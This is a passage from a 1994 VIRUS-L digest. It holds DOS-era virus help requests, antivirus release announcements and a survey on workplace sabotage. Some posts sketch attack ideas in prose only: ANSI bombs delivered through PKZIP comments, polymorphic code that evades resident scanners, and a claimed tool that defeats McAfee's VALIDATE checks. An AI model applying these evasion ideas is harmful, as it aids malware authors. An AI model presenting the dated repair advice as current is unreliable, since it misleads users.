version of FSHIELD? (PC) Hello there, In the past years, I always used FSHIELD to protect important files. I found the files shield by FSHIELD can not RUN under DOS 6.22 Could somebody out there tell me where to get a new FSHIELD? Thanks in advance. - -- - -------------------------------------------- Wen-Nung Tsai INTERNET: tsaiwn@csunix.csie.nctu.edu.tw Dep. of CSIE National Chiao Tung University HsinChu, Taiwan, R.O.C. ------------------------------ Date: Wed, 26 Oct 94 19:47:23 -0400 From: nguyent6@watserv.ucr.edu (Thi V Nguyen) Subject: Re: ubuythis.now (PC) Tony Brower (tony.brower@factory.com) wrote: : Something (presumably a virus?) is causing an empty file called : "ubuythis.now" to be created in my root directory on my hard drive. If : it is eraeed it just reappears soon. : Virusscan doesn't find anything and no damage seems to have been done, : but it's disconcerting all the same. : Anyone have any clues? : Tony Brower : tony.brower@factory.com I don't think a virus put that file there. From what I've read that file was put there by Telix for Windows ver 1. There is an update that suppouse to get rid of that file. The file is basically there to force the user to either register or delete the program. - -- Thi Nguyen nguyent6@watmail.ucr.edu ------------------------------ Date: Wed, 26 Oct 94 21:06:46 -0400 From: johnnyrock@delphi.com Subject: Re: Can a master boot record be repaired? (PC) Mike McCarty writes: >I suppose an ANSI bomb could run debug and actually type in the whole >virus creating a program in memory or on disc and then run it for you. I've seen this done. PKZIP has an option for creating an ANSI file that will be displayed when the file is dezipped. It is often used for file lists and titles but can execute an ANSI bomb. When the unsuspecting file is unzipped the code is loaded either directly or into the function keys. ------------------------------ Date: Wed, 26 Oct 94 22:15:06 -0400 From: gedaliah@panix.com (Gedaliah Friedenberg) Subject: Microsoft Anti-Virus updates (PC) I have Microsoft Anti-Virus which is dated copyright 1993. Is it possible to get an update from Microsoft to include new viruses since then? Thanks Gedaliah - -- Gedaliah Friedenberg -=- Graduate Student- City University of New York -=- -=- Ohr Somayach Yeshiva - Monsey, New York -=- ------------------------------ Date: Wed, 26 Oct 94 23:31:26 -0400 From: Zeppelin@ix.netcom.com (Mr. G) Subject: re:JUNKIE VIRUS (PC) slota@rtsg.mot.com (Dave Slota) writes: >I have removed the Junkie virus with NAV 3.0 and the lastest patch. >Both Mcafee 117 & scan 2.1.0 found it but could not clean it. It did >do a lot of damage to my windows files. Was the GDI.EXE zeroed out ? -Zep- ------------------------------ Date: Wed, 26 Oct 94 23:49:13 -0400 From: Zeppelin@ix.netcom.com (Mr. G) Subject: Re: Central Point Update? ---- FTP site? (PC) jones@cbdb1.nimh.nih.gov (Doug Jones) writes: >groener wrote: >>Does anyone know if Symantec has an FTP site so that I can get >>updates on the Virus signatures? > >Yes, it's ftp.symantec.com. But I have only seen NAV stuff there, >nothing so far for CPAV. Try OAK. oakland.edu SimTel/msdos/virus ------------------------------ Date: Wed, 26 Oct 94 23:52:37 -0400 From: Zeppelin@ix.netcom.com (Mr. G) Subject: Re: invb601.zip - The InVircible Anti-Virus Expert System v6.01 (PC) frankj@tv.tv.TEK.COM (Frank Jazowick) writes: > I just read about invb601.zip - The InVircible Anti-Virus Expert System >v6.01, and how good it is........ > > Now up to this point, I know that F-Prot was just about equal or one of >the best anti-virus shareware programs around..... So does anyone know about >this invb601.zip program and how good/reliable it is and so on?? > > I just downloaded it and am waiting for feedback from you readers to >comment on this.. I am a TBAV junkie, but I have now installed IV as a backup program. I run it at startup and use it to take the place of the TBAV Boot secure program. I annot recomend it yet, but I can say that I use it. -Zep- ------------------------------ Date: Thu, 27 Oct 94 00:38:57 -0400 From: enniaun@delphi.com Subject: Re: Need Help with Stoned Virus (PC) Gordon C Roth writes: >You will have to boot from a write protected floppy disk with the >appropriate anti virus software (McAfee-clean etc). The stoned virus You hit that on one the head. He should use the McAfee (or similar) 'CLEAN' program. Stoned it very easy to remove with it. Be sure to 'clean' EVERY bootable floppy you've got. - -Enniaun enniaun@delphi.com 71327,3333@compuserve.com ------------------------------ Date: Thu, 27 Oct 94 01:05:38 -0400 From: enniaun@delphi.com Subject: Re: Can a virus change CMOS settings??? (PC) Jan David Mol writes: >Another explanation for your problems with your CMOS is that the battery, >which makes shure that the clock in your PC keeps running even if you turn >your computer off, and which prevents your CMOS from being cleared, can be ( >almost) empty. If so, you'll have to replace it since they cannot be reloaded. Check to see if the clock is behaving correctly. When the battery starts to go, the clock starts to act up. Often it will stop cold when the system is off and start up when you power back up. Depends on the actual battery level. Yes, a porgram/virus can reset the time, but can't affect anything when the system is turned off. (sorry -typos, really bad editor on this system) Also, there are level of CMOS that you usually can't change in the CMOS menu. Some BIOSs let you reset these by holding down the INSERT key when you power up. Just another agle to check. - -Enniaun ------------------------------ Date: Thu, 27 Oct 94 06:58:57 -0400 From: Olivier.Montanuy@ens.fr (Olivier Montanuy) Subject: Mc Afee validate: still used though USELESS! (PC) I find it very funny that 5 months after I demonstrated to them that VALIDATE.EXE and VALIDATE.COM were completely useless as integrity checkers, McAfee associates *still* use this product in their packages. Well, now I know Vesselin Bontchev was right about them :-) BTW, my proggy to spoil validated files without changing the result was sent to M. Bontchev on his request. Ask him if it works :-) Not that it was really a feat at all... Real authentification use PGP. - -- # Olivier Montanuy (montanuy@dmi.ens.fr) # # Author of DeuTex/DeuSF utilities for DOOM/DOOM2 # # check infant2.sphs.indiana.edu /pub/doom/incoming # # and also ftp.cdrom.com,iglou.com,ftp.luth.se # ------------------------------ Date: Thu, 27 Oct 94 08:01:43 -0400 From: agecon@hubcap.clemson.edu (Dexter Hawkins) Subject: HELP! ANTICMOS virus (PC) I have tried the fixes mentioned in newsgroup for virus with no results. I have used FDISK /MBR and SYS C:, but still have the virus. The machine has been doublespaced using MS-DOS 6.2. Please help, I am desparate as the machine has info that the owner did not backup and it cannot be accessed. Dexter Hawkins (dexter@keowee.agecon.clemson.edu) ------------------------------ Date: Tue, 11 Oct 94 17:17:00 +0200 From: Amir_Netiv@f120.n9721.z9.virnet.bad.se (Amir Netiv) Subject: Viruses & TSRs (PC) datadec@corsa.ucr.edu (Kevin Marcus) writes: > 2. How easy is it for a virus to defeat an antivirus product loaded > as a tsr? (dos) Richard Ford answers: > I mean, who *doesn't* know how to unhook the > MSAV TSR. Even if you armour your code, the virus > writer gets as long as he likes to break it. > The other thing to remember with TSR virus protection > is that many of the virus-specific ones do not have a > very good detection ratio (see Virus Bulletin test in > September 1993 edition)... especially on the extreme polymorphics. > Indeed, it would seem that much of the effort is > concentrated on what is in the wild. I would be > interested to know how many TSR scanners get Pathogen or Queeg. > The problem here is one of overhead (both memory and performance). > Just make your code polymorphic enough, and you will > defeat the TSR. Is this a reason to remove all TSR Anti-Viruses from the memory? Please remember (Seee Virus Bulletin of some time, and all lots of other magazines) that MOST infections in the world ARE made by several FEW viruses only. So you don;t really need to look for the ultimate TSR, just a reasonable minimum overhead one will be enough. It will protect you from the very most common viruses, and as there is really NO other alternative (except get infected first and only then try to clean it)... can you recommend a better idea? Regards, * Amir Netiv. V-CARE Anti-Virus, head team * - --- * Origin: <<< NSE Software >>> Israel (9:9721/120) ------------------------------ Date: Thu, 27 Oct 94 00:15:26 -0400 From: bondt@dutiws.TWI.TUDelft.NL (Piet de Bondt) Subject: tbav - Thunderbyte anti-virus v6.26 (Complete/Windows/Optimized) (PC) I have uploaded to SimTel, the Coast to Coast Software Repository (tm), (available by anonymous ftp from the primary mirror site OAK.Oakland.Edu and its mirrors): SimTel/msdos/virus/ tbav626.zip Thunderbyte anti-virus pgm (complete) v6.26 tbavw626.zip Thunderbyte anti-virus pgm (Windows) v6.26 tbavx626.zip TBAV anti-virus - processor optimized versions The Thunderbyte Anti-Virus utilities are ShareWare. There are four security modules (TbScan, TbScanX, TbClean, TbMon) included. These modules are programmed in assembler and there for very fast! TbScan is a signature, heuristic and CRC scanner. It detects known, unknown and future viruses. TbScanX is the resident version of TbScan. TbClean is the first heuristic cleaner in the world. Even an infected file with an unknown virus can be cleaned. TbMon consists of three resident programs (TbMem, TbFile, TbDisk) which monitors your system against unknown viruses. From version 6.22 a complete Windows version is available. Note that for Windows you need both the Windows and the DOS files ! Replaces: SimTel/msdos/virus/ tbav625.zip and older tbavx625.zip and older tbavw624.zip and older TBAV is uploaded by it's authors to anon-ftp site ftp.twi.tudelft.nl in dir /pub/msdos/virus/tbav) and from there distributed to SimTel (via oak.oakland.edu), garbo.uwasa.fi, nic.funet.fi and ftp.sunet.se, and from there to their mirror-sites. Greetings, Piet de Bondt bondt@dutiws.twi.tudelft.nl ============================================================================== FTP-Admin for MSDOS Anti-virus software at anon-ftp-site: ftp.twi.tudelft.nl ------------------------------ Date: Thu, 27 Oct 94 00:15:29 -0400 From: 72571.3352@CompuServe.COM (Wolfgang Stiller) Subject: i_m231b.zip - IntegrityMaster 2.31b antivirus/data integrity (PC) I have uploaded to SimTel, the Coast to Coast Software Repository (tm), (available by anonymous ftp from the primary mirror site OAK.Oakland.Edu and its mirrors): SimTel/msdos/virus/ i_m231b.zip IntegrityMaster 2.31b antivirus/data integrity Integrity Master provides complete, easy to use, data integrity for your PC plus virus protection. It can also be used to provide file change management and security on your PC. As well as scanning for known viruses, it detects unknown viruses and unlike other products will detect files which have been damaged but not infected by a virus. IM checks and restores your CMOS including the new larger CMOS configuration memories found on most newer PCs. INTEGRITY MASTER PROTECTS YOU AGAINST ALL THREATS TO YOUR DATA AND PROGRAMS NOT JUST VIRUSES! Special requirements: None Changes: Virus scanner recognizes additional viruses and fixes false positive. Redesigned screen display. Home directory now supported for report and sector related files. i_m231b.zip has replaced i_m231.zip. ASP ShareWare. Uploaded by the author. Wolfgang Stiller Stiller Research 2625 Ridgeway St. Tallahassee, FL 32310 USA 72571.3352@CompuServe.COM wolfgang@freenet.tlh.fl.us ------------------------------ Date: Mon, 24 Oct 94 22:57:09 -0400 From: jmittell@students.wisc.edu (jajasoon tlitteu) Subject: Sabotage, Pranks & Surveillance Survey SURVEY ON SURVEILLANCE, SABOTAGE & PRANKS IN THE WORKPLACE I am doing research on the practices of individuals in workplaces in association with high-technology. Specifically I am looking for stories of people who have used high-technology in acts of personal resistance through pranks and/or sabotage. How these terms are defined is up to you - - do you think your action was a prank or sabotage? I am also looking for how high-technology is used as surveillance over workers in your workplace. If you have any stories that meet this description, please fill out the below questionnaire and return it via email to: jmittell@students.wisc.edu All stories will be used completely anonymously and I will not use the names of any people or companies in my paper. If you have any questions, concerns or suggestions for my research, do not hesitate to contact me at the above address. Do not post any responses or commentary to this newsgroup (note that this is cross-posted to many groups). Thank you in advance for your time and stories. ****************************************** 1. Please describe the job where your action(s) took place. Note whether you are still working at this job and how long you had been working there at the time. 2. Please describe the physical situation where your action(s) took place. 3. Is/was this job subject to any forms of high-technological surveillance? If so, please describe. 4. Please describe your high-technological prank or act of sabotage. 5. What were the short-term effects of this action? Possibly include how it was received by co-workers, supervisors or peers, how it made you feel about your job, any immediate shifts of power or respect in your workplace, and any other immediate effects. 6. What were the long-term effects of this action? Possibly include disciplinary responses to you or others, changes in the company9s performance or functioning, changes in your job or others, and any other long-term effects. 7. Was this action related to or affected by surveillance issues? If so, please explain how. 8. How long ago was this action? How do you feel about it now? Was it worth any negative effects it had on you? 9. If I have any further questions about your actions or your working conditions, would you be willing to answer future questions via email? 10. Please include any miscellaneous comments or issues that you feel your above answers do not address adequately. By sending this email, you are giving me permission to use your answers anonymously in my research and in the paper that will develop from this research. If you have any concerns about this, please email me. Thank you again for your participation. ------------------------------ End of VIRUS-L Digest [Volume 7 Issue 90] *****************************************